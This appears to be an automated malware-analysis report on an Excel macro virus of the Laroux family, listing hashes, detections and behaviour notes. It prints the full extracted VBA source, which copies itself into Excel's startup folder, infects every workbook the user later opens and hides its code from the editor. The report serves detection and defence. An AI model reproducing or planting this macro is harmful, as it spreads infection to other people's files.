Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 65489052084c2fad…

MALICIOUS

Office (OLE)

359.5 KB Created: 2011-02-10 10:33:56 First seen: 2015-09-17
MD5: 1aaceac73c49dbcf0ac2c393fe1b3800 SHA-1: 788712b5c9f432497c9645b89f5a58c67921a8a2 SHA-256: 65489052084c2fad48673188a072b4e88524966e7530f055df2e14751207352a
88 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample contains VBA macros, including an Auto_Open subroutine, which is a common technique for executing malicious code upon opening. The script attempts to copy itself to the Excel startup directory as 'StartUp.xls' to achieve persistence. The document body contains financial data tables, likely a lure to disguise the malicious macro.

Heuristics 3

  • ClamAV: Doc.Macro.Laroux-5893719-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.Laroux-5893719-0
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro low OLE_VBA_AUTO
    Auto_Open macro
    Matched line in script
    Sub auto_open()

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 945 bytes
SHA-256: e6a1b81a4a548e8f5cc6a7b0474d869c6f895739d5cb3b202f7eb790f51fd80c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "StartUp"
Sub auto_open()
  On Error Resume Next
  If ThisWorkbook.Path <> Application.StartupPath And Dir(Application.StartupPath & "\" & "StartUp.xls") = "" Then
    Application.ScreenUpdating = True
    ThisWorkbook.Sheets("StartUp").Copy
    ActiveWorkbook.SaveAs (Application.StartupPath & "\" & "StartUp.xls")
    n$ = ActiveWorkbook.Name
    ActiveWindow.Visible = False
    Workbooks("StartUp.xls").Save
    'Workbooks(n$).Close (true)
  End If
  Application.OnSheetActivate = "StartUp.xls!ycop"
  Application.EnableEvents = True
  Application.OnKey "%{F11}", "StartUp.xls!escape"
  Application.OnKey "%{F8}", "StartUp.xls!escape"
End Sub

Sub ycop()
  On Error Resume Next
  If ActiveWorkbook.Sheets(1).Name <> "StartUp" Then
    Application.ScreenUpdating = True
    n$ = ActiveSheet.Name
    Workbooks("StartUp.xls").Sheets("StartUp").Copy before:=Worksheets(1)
    End If
End Sub